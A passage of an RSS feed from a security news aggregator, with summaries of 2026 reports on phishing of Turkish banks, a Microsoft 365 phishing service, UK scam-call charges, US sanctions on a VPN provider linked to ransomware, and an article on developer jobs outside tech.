<pubDate>Tue, 14 Jul 2026 14:41:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybercriminals are operating an industrial-scale fraud ecosystem targeting Turkey’s financial sector, using more than 8,400 phishing domains, thousands of social media advertisements, fake loan offers, illicit gambling services, and money-mule recruitment to steal credentials. Group-IB’s investigation links these operations into…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/">Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads]]></title>
<description><![CDATA[Cybercriminals are operating an industrial-scale fraud ecosystem targeting Turkey’s financial sector, using more than 8,400 phishing domains, thousands of social media advertisements, fake loan offers, illicit gambling services, and money-mule recruitment to steal credentials. Group-IB’s investig...]]></description>
<link>https://tsecurity.de/de/3667909/it-security-nachrichten/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667909/it-security-nachrichten/cybercriminals-target-turkish-banks-with-8400-phishing-domains-and-6600-scam-ads/</guid>
<pubDate>Tue, 14 Jul 2026 14:25:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybercriminals are operating an industrial-scale fraud ecosystem targeting Turkey’s financial sector, using more than 8,400 phishing domains, thousands of social media advertisements, fake loan offers, illicit gambling services, and money-mule recruitment to steal credentials. Group-IB’s investigation links these operations into five interconnected schemes targeting dozens of Turkish banking brands. Group-IB recorded more than 6,600 scam […]</p>
<p>The post <a href="https://gbhackers.com/turkish-banks-with-8400-phishing/">Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[​​Kratos PhaaS Targets US and EU Companies: How to Reduce Microsoft 365 Account Takeover Risk​]]></title>
<description><![CDATA[Kratos is a mature Phishing-as-a-Service operation targeting Microsoft 365 users across the US, Europe, and other regions. By combining trusted platforms, anti-bot checks, and convincing login pages, ithelps attackers steal credentials while delaying detection and response. For security leaders, ...]]></description>
<link>https://tsecurity.de/de/3667527/it-security-nachrichten/kratos-phaas-targets-us-and-eu-companies-how-to-reduce-microsoft-365-account-takeover-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667527/it-security-nachrichten/kratos-phaas-targets-us-and-eu-companies-how-to-reduce-microsoft-365-account-takeover-risk/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kratos is a mature Phishing-as-a-Service operation targeting Microsoft 365 users across the US, Europe, and other regions. By combining trusted platforms, anti-bot checks, and convincing login pages, ithelps attackers steal credentials while delaying detection and response. For security leaders, that increases the risk of account takeover, fraud, data exposure, and higher incident response costs. ANY.RUN […]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/kratos-phaas-account-takeover/">​​Kratos PhaaS Targets US and EU Companies: How to Reduce Microsoft 365 Account Takeover Risk​</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN's Cybersecurity Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK charges five persons linked to fraud platform behind more than a million scam calls]]></title>
<description><![CDATA[Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila Salem, 53, all of London, are charged with offenc...]]></description>
<link>https://tsecurity.de/de/3667468/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667468/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</guid>
<pubDate>Tue, 14 Jul 2026 11:38:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila Salem, 53, all of London, are charged with offences that include conspiracy to supply articles for use in fraud, transferring and converting criminal property, and, for Zakkaria Sehailia, failing to comply with a notice to … <a href="https://www.helpnetsecurity.com/2026/07/14/russian-coms-nca-charges-scam-calls/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/14/russian-coms-nca-charges-scam-calls/">UK charges five persons linked to fraud platform behind more than a million scam calls</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK charges five persons linked to fraud platform behind more than a million scam calls]]></title>
<description><![CDATA[Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila…
Read more →
The post UK charges five persons lin...]]></description>
<link>https://tsecurity.de/de/3667464/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667464/it-security-nachrichten/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/</guid>
<pubDate>Tue, 14 Jul 2026 11:38:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five people have been charged in the UK following a National Crime Agency (NCA) investigation into Russian Coms, a caller ID spoofing service used by fraudsters. Ayoub Sehailia, 28, Zakkaria Sehailia, 30, Usman Din, 30, Denis Ozmus, 29, and Fadila…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/uk-charges-five-persons-linked-to-fraud-platform-behind-more-than-a-million-scam-calls/">UK charges five persons linked to fraud platform behind more than a million scam calls</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Five Charged in “Russian Coms” Fraud Platform Case]]></title>
<description><![CDATA[Five UK residents have been charged in relation to supplying Russian Coms fraud devices and apps]]></description>
<link>https://tsecurity.de/de/3667325/it-security-nachrichten/five-charged-in-russian-coms-fraud-platform-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667325/it-security-nachrichten/five-charged-in-russian-coms-fraud-platform-case/</guid>
<pubDate>Tue, 14 Jul 2026 10:38:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Five UK residents have been charged in relation to supplying Russian Coms fraud devices and apps]]></content:encoded>
</item>
<item>
<title><![CDATA[Five Charged in “Russian Coms” Fraud Platform Case]]></title>
<description><![CDATA[Five UK residents have been charged in relation to supplying Russian Coms fraud devices and apps This article has been indexed from www.infosecurity-magazine.com Read the original article: Five Charged in “Russian Coms” Fraud Platform Case
Read more →
The post Five Charged in “Russian Coms” Fraud...]]></description>
<link>https://tsecurity.de/de/3667322/it-security-nachrichten/five-charged-in-russian-coms-fraud-platform-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667322/it-security-nachrichten/five-charged-in-russian-coms-fraud-platform-case/</guid>
<pubDate>Tue, 14 Jul 2026 10:38:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five UK residents have been charged in relation to supplying Russian Coms fraud devices and apps This article has been indexed from www.infosecurity-magazine.com Read the original article: Five Charged in “Russian Coms” Fraud Platform Case</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/five-charged-in-russian-coms-fraud-platform-case/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/five-charged-in-russian-coms-fraud-platform-case/">Five Charged in “Russian Coms” Fraud Platform Case</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[US Treasury Sanctions VPN Provider Linked to Ransomware]]></title>
<description><![CDATA[The U.S. Treasury Department has announced new ransomware sanctions against a virtual private network (VPN) provider, its administrator, and a malware service provider accused of enabling ransomware attacks targeting Americans. The Office of Foreign Assets Control (OFAC) said the designated indiv...]]></description>
<link>https://tsecurity.de/de/3667135/it-security-nachrichten/us-treasury-sanctions-vpn-provider-linked-to-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667135/it-security-nachrichten/us-treasury-sanctions-vpn-provider-linked-to-ransomware/</guid>
<pubDate>Tue, 14 Jul 2026 09:22:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Ransomware sanctions" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Ransomware-sanctions-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="US Treasury Sanctions VPN Provider Linked to Ransomware 1"></p><p data-start="392" data-end="887">The <a href="https://thecyberexpress.com/digital-asset-cybersecurity-initiative/" target="_blank" rel="noopener">U.S. Treasury Department</a> has announced new ransomware sanctions against a virtual private network (VPN) provider, its administrator, and a malware service provider accused of enabling ransomware attacks targeting Americans. The <a href="https://thecyberexpress.com/the-us-treasury-sanctions-burma/" target="_blank" rel="noopener">Office of Foreign Assets Control</a> (OFAC) said the designated individuals and entity allegedly supplied infrastructure and tools used by cybercriminals to carry out attacks against U.S. businesses, hospitals, financial institutions, and critical infrastructure.</p>
<p data-start="889" data-end="1175">The action, coordinated with the United Kingdom, is part of broader efforts to disrupt the cybercrime ecosystem supporting ransomware operations. The Treasury said the targeted services have contributed to attacks that resulted in billions of dollars in losses across the United States.</p>

<h3 data-section-id="1m5dck8" data-start="1177" data-end="1224"><strong><span role="text">OFAC Targets 1VPNS and Its Administrator</span></strong></h3>
<p data-start="1226" data-end="1566">At the center of the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-ransomware-how-it-work/" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28959">ransomware</a> sanctions is 1VPNS, a VPN provider that OFAC described as a key infrastructure supplier for ransomware operators and other cybercriminals. The Treasury also designated Dmytro Rashevskyi, the administrator of 1VPNS, for allegedly providing technological support to cyber-enabled criminal activity.</p>
<p data-start="1568" data-end="1744">According to OFAC, <a href="https://thecyberexpress.com/stolen-vpn-credentials-most-common-ransomware-attack-vector/" target="_blank" rel="noopener">VPN</a> services have legitimate privacy and security uses but can also be misused to conceal the origin of cyberattacks, deploy malware, and manage stolen data.</p>
<p data-start="1746" data-end="1958">The Treasury <a href="https://home.treasury.gov/news/press-releases/sb0559" target="_blank" rel="nofollow noopener">said</a> ransomware groups used 1VPNS infrastructure during attacks against U.S. companies and institutions, including financial services firms, hospitals, municipal governments, and other organizations.</p>
<p data-start="1960" data-end="2207">Authorities also alleged that since 2014, 1VPNS advertised its services on cybercriminal forums while claiming it did not retain user logs or cooperate with law enforcement investigations involving illegal activities conducted through its servers.</p>
<p data-start="2209" data-end="2453">OFAC further stated that Rashevskyi used false identities, including "Maksim Sorin" and "Roman Chabanenko," to purchase infrastructure from providers that may have otherwise declined business because of abuse complaints linked to 1VPNS servers.</p>

<h3 data-section-id="2yk6gt" data-start="2455" data-end="2507"><span role="text"><strong data-start="2458" data-end="2507">Malware Provider Also Added to </strong></span><span role="text"><strong data-start="4299" data-end="4326">Ransomware </strong></span><span role="text"><strong data-start="2458" data-end="2507">Sanctions List</strong></span></h3>
<p data-start="2509" data-end="2663">The Treasury also imposed sanctions on Yegeniy Vladimirovich Silayev, a Belarusian national accused of supplying cryptors to ransomware operators.</p>
<p data-start="2665" data-end="2993">According to OFAC, cryptors are designed to disguise <a href="https://thecyberexpress.com/socgholish-malware-hit-in-operation-endgame/" target="_blank" rel="noopener">malware</a> as legitimate files, making malicious software more difficult for security products to detect or remove. Unlike traditional encryption technologies that protect user data, cryptors are intended to improve the effectiveness and stealth of <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28956">malware</a> used in cyberattacks.</p>
<p data-start="2995" data-end="3161">The Treasury alleged that Silayev provided encryption and obfuscation services to ransomware groups targeting organizations in the United States and allied countries.</p>

<h3 data-section-id="k0f7tq" data-start="3163" data-end="3224"><span role="text"><strong data-start="3166" data-end="3224">International Action Against Cybercrime Infrastructure</strong></span></h3>
<p data-start="3226" data-end="3440">The sanctions were announced in coordination with the United Kingdom's Foreign, Commonwealth &amp; Development Office, which also imposed sanctions against cybercriminals and individuals accused of enabling <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28955">cybercrime</a>.</p>
<p data-start="3442" data-end="3645">The <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28958">announcement</a> follows a May 2026 operation by European law enforcement authorities that dismantled 1VPNS's website and supporting infrastructure with assistance from the FBI's Boston Field Office.</p>
<p data-start="3647" data-end="3843">The FBI has also released a <a href="https://thecyberexpress.com/drdo-advisory-to-employees-cybersecurity/" target="_blank" rel="noopener">cybersecurity advisory </a>detailing the tactics, techniques, and procedures associated with 1VPNS to help organizations identify and defend against ransomware attacks.</p>

<h3 data-section-id="1lzao4f" data-start="3845" data-end="3883"><span role="text"><strong data-start="3848" data-end="3883">Treasury Cites Executive Orders</strong></span></h3>
<p data-start="3885" data-end="4068">The designations were issued under OFAC authorities pursuant to Executive Order 13694, as amended, along with President Donald Trump's Executive Order 14390, signed in March 2026.</p>
<p data-start="4070" data-end="4294">According to the Treasury, the order directs U.S. government agencies to strengthen protections against foreign actors involved in cybercrime, cyber-enabled <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28957">fraud</a>, extortion, and related criminal schemes targeting Americans.</p>

<h3 data-section-id="1rnnow1" data-start="4296" data-end="4326"><span role="text"><strong data-start="4299" data-end="4326">What the Sanctions Mean</strong></span></h3>
<p data-start="4328" data-end="4532">Under the sanctions, all property and interests belonging to the designated individuals and entity that are within the United States or controlled by U.S. persons are blocked and must be reported to OFAC.</p>
<p data-start="4534" data-end="4758">The restrictions also extend to entities owned 50% or more by designated persons. Unless authorized by OFAC, U.S. persons are generally prohibited from engaging in transactions involving blocked individuals or organizations.</p>
<p data-start="4760" data-end="5053">The Treasury said violations of U.S. sanctions may result in civil or criminal penalties for both U.S. and foreign persons. It also warned that financial institutions and other organizations could face sanctions exposure if they engage in prohibited transactions involving designated entities.</p>
<p data-start="5055" data-end="5296">The latest ransomware sanctions reflect continuing efforts by U.S. authorities and international partners to target the infrastructure and services that enable ransomware operators rather than focusing solely on the attackers themselves.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New tutorials on underground hacking forums have roughly doubled]]></title>
<description><![CDATA[Underground hacking forums are producing more original tutorials again, with growing attention on financial fraud, particularly the theft and fraudulent use of payment card data, known as carding, and cash-out techniques. New tutorials per month versus reposts (Source: Radware) Fraud…
Read more →...]]></description>
<link>https://tsecurity.de/de/3667101/it-security-nachrichten/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667101/it-security-nachrichten/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/</guid>
<pubDate>Tue, 14 Jul 2026 09:08:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Underground hacking forums are producing more original tutorials again, with growing attention on financial fraud, particularly the theft and fraudulent use of payment card data, known as carding, and cash-out techniques. New tutorials per month versus reposts (Source: Radware) Fraud…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/">New tutorials on underground hacking forums have roughly doubled</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New tutorials on underground hacking forums have roughly doubled]]></title>
<description><![CDATA[Underground hacking forums are producing more original tutorials again, with growing attention on financial fraud, particularly the theft and fraudulent use of payment card data, known as carding, and cash-out techniques. New tutorials per month versus reposts (Source: Radware) Fraud tutorials ga...]]></description>
<link>https://tsecurity.de/de/3667055/it-security-nachrichten/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667055/it-security-nachrichten/new-tutorials-on-underground-hacking-forums-have-roughly-doubled/</guid>
<pubDate>Tue, 14 Jul 2026 08:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Underground hacking forums are producing more original tutorials again, with growing attention on financial fraud, particularly the theft and fraudulent use of payment card data, known as carding, and cash-out techniques. New tutorials per month versus reposts (Source: Radware) Fraud tutorials gain momentum Radware analyzed 8,870 tutorial posts published across 24 deep- and dark-web forums between December 2022 and April 2026. After removing reposts, the dataset contained 3,034 unique hacking and fraud guides. “New tutorial … <a href="https://www.helpnetsecurity.com/2026/07/14/underground-hacking-forums-tutorials-research/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/14/underground-hacking-forums-tutorials-research/">New tutorials on underground hacking forums have roughly doubled</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-13 15h : 10 posts]]></title>
<description><![CDATA[10 posts were published in the last hour 12:33 : Attackers Combine MCP Recon With Cloud Metadata SSRF to Steal Service Account Tokens 12:32 : iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation 12:32 : Cybersecurity M&A Roundup:…
Read more →
The post IT Security N...]]></description>
<link>https://tsecurity.de/de/3665331/it-security-nachrichten/it-security-news-hourly-summary-2026-07-13-15h-10-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665331/it-security-nachrichten/it-security-news-hourly-summary-2026-07-13-15h-10-posts/</guid>
<pubDate>Mon, 13 Jul 2026 15:08:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>10 posts were published in the last hour 12:33 : Attackers Combine MCP Recon With Cloud Metadata SSRF to Steal Service Account Tokens 12:32 : iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation 12:32 : Cybersecurity M&amp;A Roundup:…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-13-15h-10-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-13-15h-10-posts/">IT Security News Hourly Summary 2026-07-13 15h : 10 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation]]></title>
<description><![CDATA[A digital forensics investigation from Belkasoft into an iPhone and a damaged MacBook has helped secure the conviction of Jason Cunningham, a rent-to-rent property operator who defrauded landlords and investors of more than £113,000 through forged contracts and false promises.…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3665236/it-security-nachrichten/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665236/it-security-nachrichten/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/</guid>
<pubDate>Mon, 13 Jul 2026 14:39:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A digital forensics investigation from Belkasoft into an iPhone and a damaged MacBook has helped secure the conviction of Jason Cunningham, a rent-to-rent property operator who defrauded landlords and investors of more than £113,000 through forged contracts and false promises.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/">iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation]]></title>
<description><![CDATA[A digital forensics investigation from Belkasoft into an iPhone and a damaged MacBook has helped secure the conviction of Jason Cunningham, a rent-to-rent property operator who defrauded landlords and investors of more than £113,000 through forged contracts and false promises. Cunningham ran seve...]]></description>
<link>https://tsecurity.de/de/3665126/it-security-nachrichten/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665126/it-security-nachrichten/iphone-and-macbook-forensics-investigation-exposes-113000-property-fraud-operation/</guid>
<pubDate>Mon, 13 Jul 2026 13:54:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A digital forensics investigation from Belkasoft into an iPhone and a damaged MacBook has helped secure the conviction of Jason Cunningham, a rent-to-rent property operator who defrauded landlords and investors of more than £113,000 through forged contracts and false promises. Cunningham ran several companies in the rent-to-rent sector, leasing properties from landlords and subletting them […]</p>
<p>The post <a href="https://cybersecuritynews.com/iphone-and-macbook-forensics-investigation/">iPhone and MacBook Forensics Investigation Exposes £113,000 Property Fraud Operation</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[£113,000 Property Fraud Operation Uncovered Through iPhone and MacBook Forensics Investigation]]></title>
<description><![CDATA[A rent-to-rent property scheme that defrauded landlords and investors of more than £113,000 has been unraveled through digital forensic analysis of a broken MacBook and an iPhone, leading to Jason Cunningham’s conviction on multiple fraud charges. According to Belkasoft, Cunningham ran several co...]]></description>
<link>https://tsecurity.de/de/3665124/it-security-nachrichten/113000-property-fraud-operation-uncovered-through-iphone-and-macbook-forensics-investigation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665124/it-security-nachrichten/113000-property-fraud-operation-uncovered-through-iphone-and-macbook-forensics-investigation/</guid>
<pubDate>Mon, 13 Jul 2026 13:54:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A rent-to-rent property scheme that defrauded landlords and investors of more than £113,000 has been unraveled through digital forensic analysis of a broken MacBook and an iPhone, leading to Jason Cunningham’s conviction on multiple fraud charges. According to Belkasoft, Cunningham ran several companies that leased properties from landlords and sublet them as HMOs or serviced […]</p>
<p>The post <a href="https://cyberpress.org/113000-property-fraud-operation-iphone-macbook/">£113,000 Property Fraud Operation Uncovered Through iPhone and MacBook Forensics Investigation</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Where the software development jobs are now]]></title>
<description><![CDATA[While many technology companies have slowed hiring or even launched significant layoffs, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with knowledge of AI—are in demand in other industries.



The key to success for deve...]]></description>
<link>https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</guid>
<pubDate>Mon, 13 Jul 2026 11:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>While many technology companies have slowed hiring or even launched <a href="https://www.trueup.io/layoffs" data-type="link" data-id="https://www.trueup.io/layoffs">significant layoffs</a>, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with <a href="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html" data-type="link" data-id="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html">knowledge of AI</a>—are in demand in other industries.</p>



<p>The key to success for developers looking to snatch up these roles is to be well-prepared to meet the needs of potential employers in a variety of sectors.</p>



<p>“The demand for developers in non-tech sectors is real and growing, but the roles look different from what you’d find at a software company,” says <a href="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/" data-type="link" data-id="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/">Pragati Awasthi</a>, assistant teaching professor of AI and data science at Drexel University.</p>



<p>“Across all these sectors, the common thread is that software is no longer a support function; it is embedded in core operations,” Awasthi says. “The developer in these environments is often the person translating domain-specific business problems into technical solutions, which requires a different profile than a pure product engineer at a tech firm.”</p>



<h2 class="wp-block-heading">Opportunity knocks</h2>



<p>The tech industry has long been a mainstay as far as employing software developers. But as these businesses trim staffs in efforts to cut expenses, that has impacted the hiring landscape. Even as the tech sector scales back, however, companies in industries such as financial services/fintech, healthcare/healthtech, retail/ecommerce, and manufacturing are looking to acquire programming talent.</p>



<p>“The unifying factor is data complexity,” Awasthi says. “These industries generate large volumes of sensitive, regulated, or operationally critical data, and they need developers who can build and maintain systems that handle it responsibly.”</p>



<p>While recruiting firm Summit Search Group has placed developers in roles with technology companies, “it is just as common to recruit them for roles outside this niche,” says <a href="https://www.linkedin.com/in/matterhard/" data-type="link" data-id="https://www.linkedin.com/in/matterhard/">Matt Erhard</a>, managing partner at the company. “There are actually a fairly wide variety of roles available for developers in industries beyond tech,” Erhard says.</p>



<p>For example, in financial services Summit Search Group has seen significant hiring for back-end and data engineers who can build and maintain fraud detection systems, digital banking platforms, and regulatory tools, Erhard says. In healthcare, companies are hiring developers to build AI-driven diagnostics platforms and patient portals, or to work with systems that manage electronic health records, he says.</p>



<p>In manufacturing and industrial companies, developers are needed for systems integration and embedded software related to predictive maintenance, <a href="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html" data-type="link" data-id="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html">Internet of Things</a> (IoT) systems, and smart factories. And in retail and ecommerce, there’s strong demand for <a href="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html" data-type="link" data-id="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html">full-stack developers</a> and data developers who can handle logistics systems, omni-channel platforms, and personalization engines, Erhard says.</p>



